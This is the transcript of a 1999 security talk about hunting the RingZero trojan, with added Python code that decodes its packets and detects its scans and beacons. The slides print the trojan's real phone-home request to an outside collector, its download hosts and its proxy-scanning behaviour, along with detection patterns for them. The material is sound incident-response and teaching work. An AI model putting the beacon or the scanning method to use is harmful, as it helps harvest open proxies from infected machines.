The Hunt For RingZero
Slides: 36
Provided by: North8

Transcript and Presenter's Notes

1
The Hunt For RingZero
John Green, jegreen@crosslink.net
2
Outline
  • A word about Trojans
  • Getting a clue
  • Looking for data
  • How many source hosts?
  • The hunt for the Trojan
  • Game over
  • BoF Findings

3
Trojans
This is Roland's home computer, connected to an
ISP
4
Trojans
Driving the Bus, NETBUS
5
Deep Throat - 2140
200.31.13.8 > 158.12.110.1.2140: udp 2
4500 001e e104 0000 7111 8795 ac14 0d08 c0a8 6e01
ea60 085c 000a fbb7 3030 8080 0001 0001 0000 0000
0664 6f6e 616c
200.31.13.8 > 158.12.110.2.2140: udp 2
4500 001e e204 0000 7111 8694 ac14 0d08 c0a8 6e02
ea60 085c 000a fbb6 3030 0000 0001 0000 0000 0000
0331 3831 0231
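Reading the hex dump above by hand is the skill the slide is exercising, so here is the decode done in code. This is an added example, not part of the presentation: the two hex strings are the words printed on the slide (with the obvious "coa8" typo read as "c0a8"), and the decoder walks the IPv4 and UDP headers to recover addresses, TTL, ports and payload. Note that the addresses inside the hex (172.20.13.8 to 192.168.110.x) differ from those on the summary line, and that tcpdump printed more bytes than the IP total length covers.

```python
"""Decode the two tcpdump -x hex dumps on the Deep Throat slide.

Added example, not part of the presentation.  DUMP_1 and DUMP_2 are the hex
words as printed on the slide (the 'coa8' typo read as 'c0a8').
"""
import struct

DUMP_1 = ("4500 001e e104 0000 7111 8795 ac14 0d08 c0a8 6e01 ea60 085c "
          "000a fbb7 3030 8080 0001 0001 0000 0000 0664 6f6e 616c")
DUMP_2 = ("4500 001e e204 0000 7111 8694 ac14 0d08 c0a8 6e02 ea60 085c "
          "000a fbb6 3030 0000 0001 0000 0000 0000 0331 3831 0231")

DEEP_THROAT_PORT = 2140   # UDP port the Deep Throat server listens on
PROTO_UDP = 17


def decode_ipv4_udp(hexdump: str) -> dict:
    """Parse one IPv4/UDP packet out of a whitespace-separated hex dump."""
    raw = bytes.fromhex(hexdump.replace(" ", ""))
    (ver_ihl, _tos, total_len, _ident, _frag,
     ttl, proto, _csum, src, dst) = struct.unpack("!BBHHHBBH4s4s", raw[:20])
    if ver_ihl >> 4 != 4 or proto != PROTO_UDP:
        raise ValueError("not an IPv4/UDP packet")
    ihl = (ver_ihl & 0x0F) * 4
    sport, dport, _ulen, _ucsum = struct.unpack("!HHHH", raw[ihl:ihl + 8])
    return {
        "src": ".".join(map(str, src)),
        "dst": ".".join(map(str, dst)),
        "ttl": ttl,
        "sport": sport,
        "dport": dport,
        # The IP total length bounds the real payload; tcpdump printed more
        # bytes than that, and those trailing words are not part of this packet.
        "payload": raw[ihl + 8:total_len],
        "trailing": raw[total_len:],
    }


def is_deep_throat_probe(pkt: dict) -> bool:
    """Two-byte payload '00' to UDP/2140 is the Deep Throat client's sweep probe."""
    return pkt["dport"] == DEEP_THROAT_PORT and pkt["payload"] == b"00"


if __name__ == "__main__":
    for dump in (DUMP_1, DUMP_2):
        p = decode_ipv4_udp(dump)
        print(f'{p["src"]}:{p["sport"]} -> {p["dst"]}:{p["dport"]} ttl={p["ttl"]} '
              f'payload={p["payload"]!r} deep_throat={is_deep_throat_probe(p)}')
```

Both dumps decode to a 2-byte "00" payload sent from the same source port to consecutive destination addresses, which is what a Deep Throat client sweep looks like on the wire.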
6
Trojans Review
  • The best-known trojan programs are NetBus
    and Back Orifice
  • Protective tools include all major anti-virus
    tools, Nuke Nabber, NFR's Back Officer Friendly
    and AtGuard

7
Getting A Clue
  • Sept 19, 1999 - Roland Grefer writes with an
    AtGuard detect from his home.com cable modem
  • We both commented that probes to TCP port 3128
    are not that common

8
AtGuard http://www.atguard.com
9
More Clues
  • Sept 21, 1999 - SHADOW analyst Adena Bushrod
    reports similar activity
  • Contact other organizations
  • MITRE, ARL
  • They see it too!

10
Proxy Scanning
08:58:35 ghostrid3r.1606 > 192.168.2.1.80: S (0)
08:58:36 ghostrid3r.1607 > 192.168.2.1.8080: S (0)
08:58:37 ghostrid3r.1609 > 192.168.2.1.3128: S (0)
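The three SYNs above, one second apart, are the whole signature: the same source walking 80, then 8080, then 3128 on one target. The detector below is an added example (not from the presentation) that finds that ordered triplet in tcpdump-style lines. The first three sample lines are the ones on the slide; the remaining lines are constructed to show a host that only retries port 80 and one that skips 8080, neither of which should match.

```python
"""Detect the 80 -> 8080 -> 3128 proxy-probe triplet in tcpdump-style SYN lines.

Added example, not part of the presentation.  The first three sample lines
are from the slide; the rest are constructed non-matches.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE = """\
08:58:35 ghostrid3r.1606 > 192.168.2.1.80: S (0)
08:58:36 ghostrid3r.1607 > 192.168.2.1.8080: S (0)
08:58:37 ghostrid3r.1609 > 192.168.2.1.3128: S (0)
09:02:10 laptop.2001 > 192.168.2.1.80: S (0)
09:02:11 laptop.2002 > 192.168.2.1.80: S (0)
09:10:00 10.0.0.9.4000 > 192.168.2.7.80: S (0)
09:10:01 10.0.0.9.4001 > 192.168.2.7.3128: S (0)
"""

# time  src.sport  >  dst.dport:  S ...
LINE_RE = re.compile(r"^(\d\d:\d\d:\d\d)\s+(\S+)\.(\d+)\s+>\s+(\S+)\.(\d+):\s+S\b")
PROBE_SEQUENCE = (80, 8080, 3128)


def parse(lines):
    """Yield (timestamp, src, sport, dst, dport) for each SYN line; skip the rest."""
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%H:%M:%S")
        yield ts, m.group(2), int(m.group(3)), m.group(4), int(m.group(5))


def find_triplets(lines, window=timedelta(seconds=10)):
    """Return (src, dst) pairs that hit 80, 8080 and 3128 in that order within `window`."""
    by_pair = defaultdict(list)
    for ts, src, _sport, dst, dport in parse(lines):
        by_pair[(src, dst)].append((ts, dport))
    hits = []
    for pair, events in by_pair.items():
        events.sort()
        idx, start = 0, None
        for ts, dport in events:
            if dport == PROBE_SEQUENCE[idx]:
                if idx == 0:
                    start = ts
                idx += 1
                if idx == len(PROBE_SEQUENCE):
                    if ts - start <= window:
                        hits.append(pair)
                    break
            elif dport == PROBE_SEQUENCE[0]:
                idx, start = 1, ts   # a fresh port-80 SYN restarts the sequence
    return hits


if __name__ == "__main__":
    print(find_triplets(SAMPLE.splitlines()))
```

Keying on the ordered sequence per (source, destination) pair rather than on port 3128 alone is what separates this scanner from ordinary web traffic, which hits 80 constantly and 3128 occasionally.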
11
How Big Is This Thing?!
Intrusion detection systems ranging from home
computers with cable modems to high end
government facilities have been reporting a
large number of probes to TCP port 3128, the
squid proxy service. If your site has a network
monitoring capability and you DO NOT run squid
and you detect this pattern over the next two
weeks, please let us know by sending email to
info@sans.org with "intrusion 3128" in the subject
line. If you are allowed to send the data trace,
please sanitize any of your site's network
information (destination host address) and send
the data trace as well. Thank you!
BIG!
12
Over 300 3128 Messages In Three Days
No Date      Time    Origin          Type Action Iface  Dir     Proto Source          Destination     Service S_Port Len Rule
29 23Sep1999 7:59:21 xxx.yyy.79.141  log  reject E100B1 inbound tcp   203.98.30.10    xxx.yyy.149.44  3128    64052  48  25
30 23Sep1999 7:59:24 xxx.yyy.79.141  log  reject E100B1 inbound tcp   203.98.30.10    xxx.yyy.149.44  3128    64053  48  25
31 23Sep1999 8:07:30 xxx.yyy.167.253 log  drop   qfe0   inbound tcp   196.15.173.2    xxx.yyy.214.101 3128    64025  44  48
32 23Sep1999 8:24:05 xxx.yyy.79.141  log  reject E100B1 inbound tcp   209.203.121.119 xxx.yyy.124.154 3128    3820   48  25
33 23Sep1999 8:24:11 xxx.yyy.111.133 log  reject E100B1 inbound tcp   194.51.132.171  xxx.yyy.170.248 3128    1195   44  25
34 23Sep1999 8:59:23 xxx.yyy.167.253 log  drop   qfe0   inbound tcp   156.46.64.149   xxx.yyy.135.194 3128    2570   44  48
35 23Sep1999 9:00:49 xxx.yyy.167.253 log  drop   qfe0   inbound tcp   194.51.132.171  xxx.yyy.214.228 3128    2932   44  48
36 23Sep1999 9:14:51 xxx.yyy.111.133 log  reject E100B1 inbound tcp   195.44.9.20     xxx.yyy.95.90   3128    1089   44  25
37 23Sep1999 9:33:38 xxx.yyy.167.253 log  drop   qfe0   inbound tcp   212.130.192.222 xxx.yyy.139.66  3128    2678   48  48
38 23Sep1999 9:40:13 xxx.yyy.167.253 log  drop   qfe0   inbound tcp   193.125.239.105 xxx.yyy.1.31    3128    1531   48  48
39 23Sep1999 9:56:08 xxx.yyy.167.253 log  drop   qfe0   inbound tcp   194.249.154.21  xxx.yyy.27.35   3128    2515   44  48
40 23Sep1999 9:57:40 xxx.yyy.79.141  log  reject E100B1 inbound tcp   200.14.243.166  xxx.yyy.123.25  3128    4879   48  25

Over 1000 Source Hosts!
13
What Are The Possibilities? > 1000 Source Hosts
  • Spoofed
  • Worlds largest coordinated attack
  • Trojan software or malware

14
Source Host Analysis
I am almost certain that these are indeed live,
non-spoofed hosts. First, I've dumped the
tcpdump traffic with the arriving TTL values.
I've done about a dozen traceroutes back to
the source IPs and the hop counts are believably
close. Also, other clues found in the tcpdump
output itself appear to point to different hosts
or a very wise crafter.
Judy Novak - ARL
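The check described in the analysis above, comparing the arriving TTL with a traceroute back to the source, can be written down as a small triage routine. This is an added example, not the ARL analysis itself. Most IP stacks start TTL at 32, 64, 128 or 255, so the smallest of those that is at least the arriving value is the likely initial TTL and the difference is the number of hops the packet really travelled; if traceroute to the claimed source needs a very different number of hops, the source address was probably forged. The observations are constructed (RFC 5737 addresses); the TTL of 113 is the value in the Deep Throat hex dump earlier in the deck.

```python
"""TTL-versus-traceroute plausibility check for "are these sources spoofed?"

Added example, not the ARL analysis.  OBSERVATIONS are constructed.
"""
from typing import Optional

INITIAL_TTLS = (32, 64, 128, 255)   # common initial TTLs, smallest first


def infer_hops(arriving_ttl: int) -> Optional[int]:
    """Hops travelled, assuming the nearest common initial TTL at or above the observed one."""
    for initial in INITIAL_TTLS:
        if arriving_ttl <= initial:
            return initial - arriving_ttl
    return None   # an IPv4 TTL cannot exceed 255


def plausible_source(arriving_ttl: int, traceroute_hops: int, slack: int = 3) -> bool:
    """True when the TTL-derived hop count agrees with traceroute within `slack` hops.

    Asymmetric routing makes a difference of a hop or two normal; a large
    difference means the packet did not come from where its source says.
    """
    hops = infer_hops(arriving_ttl)
    return hops is not None and abs(hops - traceroute_hops) <= slack


# Constructed observations: (claimed source, arriving TTL, hops measured by traceroute)
OBSERVATIONS = [
    ("198.51.100.10", 113, 14),   # 128 - 113 = 15 hops; traceroute 14: consistent
    ("198.51.100.20", 44, 19),    # 64 - 44 = 20 hops; traceroute 19: consistent
    ("198.51.100.30", 241, 12),   # 255 - 241 = 14 hops; traceroute 12: consistent
    ("203.0.113.99", 126, 21),    # 128 - 126 = 2 hops, traceroute 21: not believable
]


def triage(observations) -> dict:
    """Map each claimed source to whether its TTL and traceroute agree."""
    return {src: plausible_source(ttl, hops) for src, ttl, hops in observations}


if __name__ == "__main__":
    for src, ok in triage(OBSERVATIONS).items():
        print(f"{src:15} {'plausible' if ok else 'SUSPECT'}")
```

The heuristic is ambiguous near the boundaries (an arriving TTL of 30 could be 32 minus 2 or 64 minus 34), which is why the slide's method pairs it with the other clues in the tcpdump output rather than relying on TTL alone.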
15
The First Hot Tip - Sept 23
We began receiving probes to 3128 on Wednesday,
September 15th. The probes come in a triplet -
first to TCP port 80, then 8080, then 3128. The
probes appear to be going after random
addresses. One finally hit a web server listening
on port 80 so I got to see what it was doing. It
sent the following request to the
server:
GET http://www.rusftpsearch.net/cgi-bin/pst.pl/?pst_mode=writeip&pst_host=192.168.2.1&pst_port=3128
Anonymous
Later verified by four other sources.
16
So What?
Just a couple additional pieces of information.
I only probed back in a rather simple way about 5
machines and found none of those running finger,
SMTP or FTP, though all were running TCP port
139, so I concluded (with a very small sample
size) it was a Windows attack of some kind,
though I admit this is a guess based on sketchy
information.

Anonymous
17
Game Over?
I am the Network Security Officer at Vanderbilt
University. I have a system that was infected
with a trojan called RingZero and was
scanning for ports 80, 8080, and 3128. I have
pieces of the code specifically a file called
its.exe and a file that was Ring0.vxd. I am
still trying to find the original infected file
and I suspect that it was a screen saver. If
you would like more info give me a call.
Ron Marcum, Vanderbilt
18
Extreme BoF - Decoding RingZero
  • 7PM - 2AM
  • My Thanks To All Involved!

19
Basic Game Plan
  • Move the Vanderbilt files to a safe platform
    for examination
  • Use strings and other unix utilities to examine
    the files
  • Targeting mechanism was a primary interest

20
Hour 1 - Gameplan Deviation
  • Strings, etc. didn't get us too far
  • RingZero uses Ian Luck's Petite program to
    compress the executables
  • Tim White volunteers to sacrifice his windows
    laptop

21
Hour 2 - Deliberate Infection
  • Created a mini-network
  • 2 computers, both running sniffers
  • Unzipped the archive
  • Two files its.exe, pst.exe
  • it was a coin-toss

22
Hour 3 - Examining ITS.EXE
  • Ran its.exe
  • removed itself from the desktop
  • its.exe and Ring0.vxd placed in \windows\system
    directory
  • created an empty its.dat file
  • No network activity :(

23
Traffic At Last!
  • After rebooting, the infected machine started
    doing DNS queries for hosts named
  • phzforum.virtualave.net
  • xoom.members.com
  • Now we're getting somewhere!

24
So What Now?
  • Created an entry in the infected machine's hosts
    file
  • Gave it the ip address of the sniffer
  • Infected machine started sending web requests on
    port 80

25
Hours 4 and 5 - Reconfiguring the Sniffer Machine
  • Switched to Linux
  • Ran Apache and tcpdump
  • Apache logs showed that its.exe was trying to
    retrieve an its.dat file from the webservers
  • phzforum.virtualave.net/its.dat
  • xoom.members.com/harmer/its.dat

26
What Should Be In ITS.DAT?
  • its.dat no longer existed on
    phzforum.virtualave.net
  • Terminal room closed before we discovered the
    xoom.members.com connection
  • its.dat was found the following morning, but it
    is encrypted?

27
Party Over? - Nope!
  • Getting very late
  • Oak Room closed
  • Remaining BoF members relocated to a corner,
    downstairs in LaSalle's

28
Hours 6 and 7 Running The PST.EXE File
  • Ran PST.EXE
  • Initial behavior was the same as the its.exe
  • relocated itself, etc.
  • PST.EXE spewed packets to
  • ports 80, 8080, and 3128!

29
PST.EXE Behavior
  • Generated a small list of random? IP addresses
  • Scanned all IPs for port 80, then 8080, and
    finally 3128
  • Repeated

30
What Is It Doing Though?
  • Since the scan was sequential, we were able to
    configure apache on-the-fly to answer web
    requests for IPs in the scan.
  • Examining the Apache logs showed what we had
    hoped for

31
The End Game
GET http://www.rusftpsearch.net/cgi-bin/pst.pl/?pst_mode=writeip&pst_host=192.168.2.1&pst_port=3128
The proxy is being used to send its own IP
address and proxy port home to the mothership!
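The request above is worth two detections on a web server: the pst.pl beacon itself, which carries the victim's address and proxy port in its query string, and, more generally, any proxy-style request (an absolute URI in the request line) arriving at a server that is not a proxy, which is how the anonymous reporter first saw it. The code below is an added example, not from the BoF. The sample access log lines are constructed in Apache common log format around the request string on the slide; the parameter names pst_mode, pst_host and pst_port are as reconstructed from the slide.

```python
"""Extract RingZero "phone home" beacons from Apache common-log lines.

Added example, not from the BoF.  SAMPLE_LOG is constructed; the beacon
request string is the one shown on the slide.
"""
import re
from urllib.parse import parse_qs, urlsplit

# client ident user [time] "method target proto" status size
CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)(?: (\S+))?" (\d{3}) (\S+)')
BEACON_HOST = "www.rusftpsearch.net"
BEACON_PATH = "/cgi-bin/pst.pl"

SAMPLE_LOG = """\
192.168.2.9 - - [23/Sep/1999:08:58:35 -0400] "GET / HTTP/1.0" 200 1043
192.168.2.9 - - [23/Sep/1999:08:58:37 -0400] "GET http://www.rusftpsearch.net/cgi-bin/pst.pl/?pst_mode=writeip&pst_host=192.168.2.1&pst_port=3128 HTTP/1.0" 404 207
192.168.2.9 - - [23/Sep/1999:08:58:39 -0400] "GET http://example.test/ HTTP/1.0" 404 207
"""


def parse_clf(lines):
    """Yield (client, method, target, status) for each well-formed log line."""
    for line in lines:
        m = CLF_RE.match(line)
        if not m:
            continue
        client, _when, method, target, _proto, status, _size = m.groups()
        yield client, method, target, int(status)


def absolute_uri_requests(lines):
    """Requests that name a full URL, i.e. the client thinks we are a proxy."""
    return [(client, urlsplit(target).netloc)
            for client, _m, target, _s in parse_clf(lines)
            if urlsplit(target).scheme in ("http", "https")]


def parse_beacons(lines):
    """Beacons aimed at the pst.pl collector, with the victim's self-reported host and port."""
    beacons = []
    for client, _method, target, status in parse_clf(lines):
        u = urlsplit(target)
        if u.netloc.lower() != BEACON_HOST or not u.path.startswith(BEACON_PATH):
            continue
        q = parse_qs(u.query)
        beacons.append({
            "client": client,                       # who sent it to us (the scanning host)
            "mode": q.get("pst_mode", [""])[0],
            "reported_host": q.get("pst_host", [""])[0],   # the proxy being reported
            "reported_port": int(q.get("pst_port", ["0"])[0] or 0),
            "status": status,
        })
    return beacons


if __name__ == "__main__":
    print(absolute_uri_requests(SAMPLE_LOG.splitlines()))
    print(parse_beacons(SAMPLE_LOG.splitlines()))
```

The reported host and port come from the query string, not from the log line's client address: on a real open proxy the log line would show the scanner, while pst_host names the proxy itself, which is exactly the information the "mothership" is collecting.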
32
Review of Findings
  • ITS.EXE attempts to retrieve files from various
    webservers
  • PST.EXE is the active scanner
  • doesn't require the its.dat file to run
  • discovered proxies send their IPs to
    www.rusftpsearch.net

33
Questions Still Remain
  • Infection mechanism?
  • How does it start at boot time?
  • What is the its.dat file for?
  • Targeting
  • Scan intensity dial
  • Attack configuration

34
Implications?
  • Quantum leap in distributed attack technology
  • Viral infection rates
  • Configurable - its.dat
  • scanning -> attacking?
  • Automatic result consolidation

35
  • Thank you